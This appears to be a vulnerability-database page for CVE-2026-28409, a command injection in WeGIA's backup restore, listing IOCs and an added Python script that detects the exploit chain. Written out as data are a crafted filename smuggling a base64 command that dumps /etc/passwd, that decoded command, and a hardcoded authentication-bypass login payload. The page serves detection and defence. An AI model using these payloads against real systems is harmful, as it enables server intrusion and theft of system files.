cbcvebase.
CVE-2026-28409
published 2026-02-27


Priority: P2 · 61 · high
CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Exploit: available (Nuclei template)
EPSS: 3.31% (87.0th percentile)
WeGIA is a web manager for charitable institutions. Prior to version 3.6.5, a critical Remote Code Execution (RCE) vulnerability exists in the WeGIA application's database restoration functionality. An attacker with administrative access (which can be obtained via the previously reported Authentication Bypass) can execute arbitrary OS commands on the server by uploading a backup file with a specifically crafted filename. Version 3.6.5 fixes the issue.

Affected (2 ranges)

Vendor            Product   Version range   Fixed in
labredescefetrj   wegia     < 3.6.5         3.6.5
wegia             wegia     < 3.6.5         3.6.5

Detection & IOCs (extracted from sources)

url       /WeGIA/html/login.php
url       /WeGIA/html/configuracao/importar_dump.php
url       /WeGIA/html/configuracao/gerenciar_backup.php
filename  dump;export F={(unknown)};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz
          (the base64 decodes to the command below; {(unknown)} is the randomized artifact name)
command   cat /etc/passwd > /var/www/html/WeGIA/$F.txt
path      /var/www/html/WeGIA/
bytes     1f8b08000000000000030300000000000000000000
          (a minimal empty gzip stream; 1f 8b 08 is the gzip magic)
  • Look for multipart POST requests to /WeGIA/html/configuracao/importar_dump.php where the uploaded filename contains shell metacharacters (semicolons, pipes, $(...)) or a base64-encoded payload, indicative of command injection via a crafted backup filename.
  • Detect GET requests to gerenciar_backup.php with an action=restore parameter whose file= value contains URL-encoded shell metacharacters (%3B = ';', %7C = '|') and base64 strings, indicating RCE exploitation attempt.
  • Monitor for the creation of unexpected .txt files under /var/www/html/WeGIA/ (e.g., <random>.txt) which are the exfiltration artifacts written by the injected command (cat /etc/passwd > /var/www/html/WeGIA/$F.txt).
  • The exploit chain begins with an authentication bypass POST to /WeGIA/html/login.php using hardcoded parameters c=true&cpf=admin&id_pessoa=1 — alert on this specific login payload pattern.
  • Regex match on HTTP response body for 'root:.*:0:0:' to confirm successful /etc/passwd exfiltration via the RCE payload.
  • The exploit requires administrative access, which can be chained from a prior authentication bypass vulnerability in WeGIA. The 7.2 vector above (PR:H) scores the RCE on its own; a CVSS 10.0 score with PR:N, where a source reports one, reflects the chained attack scenario, not standalone exploitation of this RCE.
  • The Nuclei template uses a randomized 8-character lowercase alpha filename variable ({{to_lower(rand_text_alpha(8))}}) as the exfiltration artifact name, so detection rules keyed on a static filename will miss it; match on the /var/www/html/WeGIA/ path and the .txt suffix instead.
  • Affected versions are WeGIA <= 3.6.4; version 3.6.5 patches the issue. Use version fingerprinting to scope detection to unpatched instances.
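The detection rules above, implemented as an added example and run over constructed sample requests. This is not code from WeGIA, from the Nuclei template or from any of the page's sources. The paths, parameters, base64 payload and decoded command are the IOCs listed above; the request records, the ordinary-login body and the 8-letter artifact name qwertyui are invented stand-ins. The query parser deliberately uses unquote rather than unquote_plus so that a literal '+' inside a base64 payload is not turned into a space before the rules see it.

```python
"""Detection rules for the CVE-2026-28409 exploit chain against WeGIA.

Added example, not code from the WeGIA project or from the page's sources.
Request records below are constructed to mirror the published IOCs; the
8-letter name 'qwertyui' stands in for the randomized artifact name.
"""
import base64
import re
from urllib.parse import quote, unquote, urlsplit

LOGIN_PATH = "/WeGIA/html/login.php"
IMPORT_PATH = "/WeGIA/html/configuracao/importar_dump.php"
BACKUP_PATH = "/WeGIA/html/configuracao/gerenciar_backup.php"

# Shell metacharacters that have no business in a backup filename.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")
# A base64-looking run long enough to carry a command rather than a hash fragment.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Confirms the root line of /etc/passwd came back in a response body.
PASSWD_LEAK = re.compile(r"root:.*:0:0:")

# Published IOC payload (decodes to: cat /etc/passwd > /var/www/html/WeGIA/$F.txt)
B64_PAYLOAD = "Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ="
CRAFTED_NAME = f"dump;export F=qwertyui;eval $(echo {B64_PAYLOAD} | base64 -d);poc.dump.tar.gz"

# Constructed traffic: (method, uri, form body or None, multipart upload filename or None)
SAMPLE_REQUESTS = [
    ("POST", LOGIN_PATH, "c=true&cpf=admin&id_pessoa=1", None),            # auth bypass
    ("POST", IMPORT_PATH, None, CRAFTED_NAME),                              # crafted upload
    ("GET", BACKUP_PATH + "?action=restore&file=" + quote(CRAFTED_NAME, safe=""), None, None),
    ("POST", IMPORT_PATH, None, "backup_2026-02-27.dump.tar.gz"),           # benign upload
    ("GET", BACKUP_PATH + "?action=restore&file=backup_2026-02-27.dump.tar.gz", None, None),
    ("POST", LOGIN_PATH, "cpf=12345678901&senha=hunter2", None),            # ordinary login
]


def query_params(query):
    """Split a query string or urlencoded body by hand, decoding with unquote
    (not unquote_plus) so a literal '+' inside a base64 payload survives."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def decoded_commands(text):
    """Decode every base64-looking run in text that yields printable ASCII."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        if raw and all(32 <= b < 127 or b in (9, 10) for b in raw):
            found.append(raw.decode("ascii"))
    return found


def suspicious_name(name):
    """True when a filename carries shell metacharacters or a base64 payload."""
    return bool(SHELL_META.search(name) or B64_RUN.search(name))


def classify(method, uri, body, filename):
    """Return the list of rule hits for one request (empty when clean)."""
    parts = urlsplit(uri)
    hits = []
    if method == "POST" and parts.path == LOGIN_PATH:
        p = query_params(body or "")
        if p.get("c") == ["true"] and p.get("cpf") == ["admin"] and p.get("id_pessoa") == ["1"]:
            hits.append("auth-bypass-login")
    if method == "POST" and parts.path == IMPORT_PATH and filename and suspicious_name(filename):
        hits.append("crafted-upload-filename")
        hits += ["decoded:" + c for c in decoded_commands(filename)]
    if method == "GET" and parts.path == BACKUP_PATH:
        q = query_params(parts.query)
        if q.get("action") == ["restore"]:
            for f in q.get("file", []):
                if suspicious_name(f):
                    hits.append("restore-injection")
                    hits += ["decoded:" + c for c in decoded_commands(f)]
    return hits


def passwd_leaked(response_body):
    """True when a response body contains the root line of /etc/passwd."""
    return PASSWD_LEAK.search(response_body) is not None


def scan(requests):
    """Return (index, hits) for every request that trips at least one rule."""
    results = []
    for i, req in enumerate(requests):
        hits = classify(*req)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_REQUESTS):
        print(i, SAMPLE_REQUESTS[i][0], SAMPLE_REQUESTS[i][1][:60], hits)
```

Only the first three constructed requests trip a rule; the benign upload, benign restore and ordinary login pass. Because the base64 run is decoded rather than merely flagged, the hit for the crafted upload and the restore call both surface the underlying command, which is what an analyst needs to decide whether the artifact under /var/www/html/WeGIA/ was actually written.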